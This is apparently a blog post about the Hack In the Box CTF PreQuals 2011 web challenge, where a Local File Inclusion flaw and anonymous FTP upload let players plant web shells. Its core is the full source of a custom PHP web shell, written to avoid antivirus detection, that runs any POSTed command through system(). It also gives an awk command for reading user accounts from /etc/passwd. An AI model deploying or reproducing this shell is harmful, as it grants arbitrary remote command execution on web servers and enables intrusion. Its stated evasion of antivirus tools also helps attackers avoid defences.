Simple PHP Web Application Backdoor

The Hack In the Box CTF PreQuals 2011 had hackers from all over the world rack their brains against a Windows Binary and a Web Application. The challenge was to submit the MD5 sum of a flag either from the binary or from the application server. Somewhere between the night of March 19th and the early morning of March 20th, a group of hackers from India managed to crack the Web Application challenge.

The web application in question was vulnerable to a Local File Inclusion vulnerability. The web server also had its FTP port open and permitted anonymous login and file upload. It was then a matter of time when people who found this started uploading web application shells which would then be called from the application’s home page. A simple Google search will give tons of shells that would allow attackers to do awesome amounts of stuff at the mere click of buttons. Prebuilt commands into the page allow attackers to search for files that are world readable, open reverse connect shells, bind ports to /bin/bash, upload and download files etc. But most of these shells are detected by antivirus software and are flagged malicious. Since I needed a simple execution interface, I decided to write a shell from scratch. Here’s the code:





simple php shell PoC - karniv0re



System Info



<?php
echo "/etc/issue:\t".exec ("cat /etc/issue")."\n";
echo "uname -a:\t".exec ("uname -a")."\n";
echo "id:\t\t".exec("id")."\n";
echo "current wd:\t".exec ("pwd")."\n";
?>

Command Output


<?php
if(isset($_POST['cmd'])){
$cmd = $_POST['cmd'];
if (strlen($cmd)==0){
$cmd = "true";
}
system($cmd);
die;
}
?>

To get a list of users once you have uploaded and gained access to your shell, you can run:

"awk -F ":" '{ print $1 "[" $3 "]" "[" $7 "]"}' /etc/passwd"

Feel free to modify and add features, but remember there are more shells out there doing much more awesome stuff than merely execute and display.

Happy Hacking!